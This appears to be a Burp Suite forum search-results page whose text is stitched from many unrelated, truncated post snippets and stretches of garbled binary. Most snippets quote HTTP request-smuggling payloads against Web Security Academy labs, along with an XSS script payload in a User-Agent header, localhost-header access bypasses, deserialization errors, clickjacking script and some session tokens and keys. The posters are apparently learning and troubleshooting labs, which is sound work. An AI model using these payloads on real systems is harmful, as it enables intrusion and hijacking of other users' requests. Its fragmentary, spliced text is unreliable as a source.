Burp Suite User Forum
Found 250 posts in 99 threads
oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded … Content-Length: 13
tRANSFER-ENCODING: chunked
3
x=y
0
================================== … oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded … Content-Length: 19
tRANSFER-ENCODING: chunked
3
x=y
1
Z
Q
============================ … Content-Length: 13
tRANSFER-ENCODING: chunked
3
x=y
1
Z
Q
============================
id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y= … Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y= … Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1
And I am unable to log in, therefore no request … =1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y= … is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1</p>
</div>
</section
--------------- S Y S T E M ---------------
OS:
Windows Server 2019 , 64 bit Build 17763 (10.0.17763.3287
Now run:
```
curl -i https://www.google.com/do/not/try -H 'Cookie: x=y=0&x=y&x=y&x=y&x=y&x=y&x=y& … x=y&x=y&x=false; foobar=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ … additional requests
Now run the following (this only differs by one character, x=y10 instead of x=y= … 0):
```
curl -i https://www.google.com/do/not/try -H 'Cookie: x=y10&x=y&x=y&x=y&x=y&x=y&x=y&x=y&x=y
In both cases, the "x=y=0" request resulted in additional insertion points and more requests sent.
id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y= … Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
kali:latest
ARG KALI_DESKTOP=xfce
RUN apt update && DEBIAN_FRONTEND='noninteractive' apt install -y … kali-desktop-xfce \
kali-tools-top10 \
&& DEBIAN_FRONTEND='noninteractive' apt-get purge -y … pm-utils xscreensaver*
ENV DISPLAY :1
ENV KALI_DESKTOP ${KALI_DESKTOP}
RUN apt-get install -y
Area
* IMessageEditor res: Response Text Area
* String text: Selected line to highlight
* Int x,y, … public Graphics highlight(Graphics g, IMessageEditor req, IMessageEditor res, String text, int x, int y, … ln.getAscent() + ln.getDescent());
int x1 = x + (width - textWidth)/2;
int y1 = (int)(y … gr.setColor(Color.YELLOW);
gr.setBackground(Color.YELLOW);
gr.fillRect(x, y,
Z���ƥzT��$�Yz��Y���������g����ʻ-?�<��KH��y˱o�M����[m݅Q@$A �Ab+�ҵwvKk��7���? … L�Z��,5 :c�����H��SЏ��������p5���s����T�y�?J�5���q>y���&�G^�.tіpFg���}�? … ��$ti;�åeQ�s�y'֊��VG�X���U�Y�(�0 (�� ��/�Yo�:������k��p:�����j�|,��5�F0�ѹ�. … Sܱi-���EKo�2�(Y����� ������ޢ�r[w�Y�!M_���u�f��O21讆? … CU��Y�bb��k�,��W����?
For example, if the cluster bomb would give P1=X, P2=Y, P3=Z for one iteration, I would like to send: … param1 = X-Y-Z
param2 = X-Y-Z
Thank you for your help
following request, everything will work normally:
TRACE / HTTP/2
Host: foo.com
User-Agent: foobar
X: Y … ... then the TRACE request reflected back]
TRACE / HTTP/2
Host: foo.com
User-Agent: foobar
X: Y
Yes [y, Enter], No [n]
Choose whether to delete the data directory (/var/lib/BurpSuiteEnterpriseEdition … Yes [y], No [n, Enter]
Choose whether to delete the logs directory (/var/log/BurpSuiteEnterpriseEdition … Yes [y], No [n, Enter]
Choose whether to delete the database backups directory (/var/lib/BurpSuiteEnterpriseEdition … Yes [y], No [n, Enter]
```
To run the installer silently you can use the ```-q``` switch.
Origin: https://ac921f4f1ec67a2fc05d23890023008c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … =1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=
I was able to copy
As follows
��search__users��Y,!t@�TESS(�
please treat me favorably
[y/N] Y
Do you want Burp Infiltrator to report the full parameter value when input reaches a potentially … [Y/n] [5.236s][info][class,load] java.util.IdentityHashMap$IdentityHashMapIterator source: jrt:/java.base … [Y/n]
Do you want to allow communication over unencrypted HTTP? … [y/N]
Do you want to restrict the Burp Collaborator servers that can be used? … [y/N]
Enter the file path to the target application bytecode.
responses" is given as
"POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … server was given as
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … should be like this:
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Content-Length: 146
x=POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
web server where certain categories of files (images, css) were having a filename of the format "_x-y" … with no extension, where x and y is a alphanumeric value of a varying length of characters, eg _0a1b2c4d5e-f6g7h8i9j
return [left,top];
}function generateClickArea(pos) {
var elementWidth, elementHeight, x, y, … window.clickbandit.elementHeight = elementHeight;
x = window.clickbandit.config.clickTracking[pos].left;
y … btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y … = btn.offsetTop;
container.style.overflow = 'hidden';
container.style.clip = 'rect('+y+'px, ' … +(x+w)+'px, '+(y+h)+'px, '+x+'px)';
container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)
return [left,top];
}function generateClickArea(pos) {
var elementWidth, elementHeight, x, y, … window.clickbandit.elementHeight = elementHeight;
x = window.clickbandit.config.clickTracking[pos].left;
y … btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y … = btn.offsetTop;
container.style.overflow = 'hidden';
container.style.clip = 'rect('+y+'px, ' … +(x+w)+'px, '+(y+h)+'px, '+x+'px)';
container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)
There are x number of requests queued in Spider and y number of forms queued.
HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 272
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Symfony Version: 4.3.6
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Thanks
POST / HTTP/1.1
Host: my host.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 105
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
i sent:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded … Content-Length: 13
tRANSFER-ENCODING: chunked
3
x=y
1
Z
Q
And the response was:
HTTP/1.1
p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
portwigger:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
de wiener/peter testeando la aplicación para saber que pasaba, luego de eso intenté iniciar sesión y … username or invalid password", a lo cual yo dijé "logico, borré la cuenta", pero si borro el historial y
POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1
Host: www.---------.com
Origin: http://example.com … : */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded … Content-Length: 1410
Origin: https://www.--------.com
Connection: close
Referer: https://www.realself.com
this:
sudo apt update && apt upgrade
sudo apt dist-upgrade
then type in terminal:
burpsuite
y
The URL is http://burp/ - there's no www.
receiving this error:
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2
3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www … /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal
HTTP/1.1
Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … username=carlos HTTP/1.1
X-ayZFvQ-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length
error
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
access token for user administrator in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
74%39
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
??
this error:
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Then, what I did is:
Modifying serialized objects"
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 4
echo "O:4:"User":2
provided is:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Y me sucede lo mismo que Marc: Algo anda mal con este laboratorio. … Todo lo que ve el registro de acceso es acceso interno al acceder al correo electrónico y al registro
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
���0��0U%
0
+0
U�00U�y�<���pT���YK … ���0��0U%
0
+0
U�00U�y�<���pT���YK … ���0��0U%
0
+0
U�00U�y�<���pT���YK … ���0��0U%
0
+0
U�00U�y�<���pT���YK … ���0��0U%
0
+0
U�00U�y�<���pT���YK
burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5
HTTP/1.1
Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … 1.1
Host:
aca71f681fe0a61c80c01e0d01930066.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Please see below:
POST / HTTP/1.1
Host: <lab-ID>.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
response when i sent this request
POST / HTTP/1.1
Host: my lab id
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a3a008503e2d7a7c03e1b91006c0030.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
the lab
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 277
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
However since the simulated user and the exploit server are probably on the same network the "www" part … Removing the "www" part did the trick. Thx for your concern.
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
án6
%¦Y
However, on my machine - Appears to be quite similar, however some subtle differences -
com.host1.www
com.host1.www1
com.net2.www
even though the hostnames are actually displayed as expected
I'll past the request:
POST / HTTP/1.1
Host: victimhost
Content-Type: application/x-www-form-urlencoded … postId=1 HTTP/1.1
Host: exploitserver
Content-Type: application/x-www-form-urlencoded
Content-Length
Luego de este error se ingresa a la cuenta se descarga la licencia y vuelve a salir dicho error.
Here is what is shown in the Site map window right above (list of all URLs):
https://www. … id=WEB87431-20150616190 HTTP/1.1
Same with:
https://www._something_ com/ - GET - /bp_chart.php?
The install command is following:
$ sudo apt-get -y install fonts-ipafont
(Verified on Kali Linux 2023.4
Exploit:
```
POST / HTTP/1.1
Host: my-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
vulnerabilities:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
to the 'Level progress' section of the Dashboard, which will record your progress in terms of 'X of Y'
acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
Content-Type: application/x-www-form-urlencoded … Transfer-encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Length: 600
Content-Type: application/x-www-form-urlencoded
Hi,
I would like to know if there would be problems with the license of burp suite PRO y I have one
reads as below:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
binario, tambien el comando update-alternatives, en la terminal me devuelve bien el objeto serializado y
Transfer-Encoding: chunked
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … supposed to be:
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www
HTTP/1.1
Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded … POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters)
Content-Type: application/x-www-form-urlencoded
x=y"
/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1
Host: www..... … Connection: close
Content-Length: 3002
X-Single-Page-Navigation: true
Origin: https://www.....
https://www.?elp.com
Luego de este error se ingresa a la cuenta se descarga la licencia y vuelve a salir dicho error.
like Gecko) Chrome/88.0.4324.150 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded … keep-alive
96
GET /404 HTTP/1.1
X: x=1&q=smugging&x=
Host: example.com
Content-Type: application/x-www-form-urlencoded
already did all the adjusts and I tried to submit the solution in different browsers (Firefox, Edge y
hello, I would like to carry out an authenticated scan on the domain Y but to access this domain I must
%Y %H:%i:%s') as FULL_DATE_CHANGE
,DATE_FORMAT(sc.DATE_CHANGE, '%d.%m. … %Y') as DATE_CHANGE
,sc.USER_ID
,scsite.URL as SITE_URL
,scsite.SITE_ID
,stt.RANK as `RANK`
HTTP/1.1
Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Content-Length: 251
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
this -
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.
: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded … : 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded
As such, it is recommended to set the header as X-XSS-Protection: 0"
Reference https://owasp.org/www-project-secure-headers
for example :
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
The Content-Type is: application/x-www-form-urlencoded
2021-12-16 17:54:42 [r] INFO - Detail: {"method":"Fetch.req - 0063\u0007Un^f\u00164\\C\uda62 >>> Y … <<< >z,a&S}\u0
2021-12-16 17:54:42 [r] INFO - net.portswigger.fe: Expected '\' but got 'Y' at [line
(y/n)".
Kindly help.
.*\.example\.com\/*
test\.net\/path\/here\/*
www\.test\.net\/*
-----------
with left click, right click send to repeater, POST request this time, redacted below:
POST /w/x/1/y-z
7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84
Connection: close
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a90006303d9bbc387c5700800820036.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Put the following into a .txt file:
y
LICENSE-KEY-PASTED-HERE
o
4.
0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded … 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded
Hi,
It looks like you are trying to achieve what is described in the articles below:
- https://www
HTTP/1.1
Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
solution :
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length
HTTP/2
Host: 0a6f004904bb0b7282f5067100c70057.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
X-CSRFToken: I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6
Content-Type: application/x-www-form-urlencoded … Connection: close
X-Forwarded-For: 127.0.0.1
Notice the change to "Content-Type: application/x-www-form-urlencoded
0ac000af04eed935c3233d650017001f.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded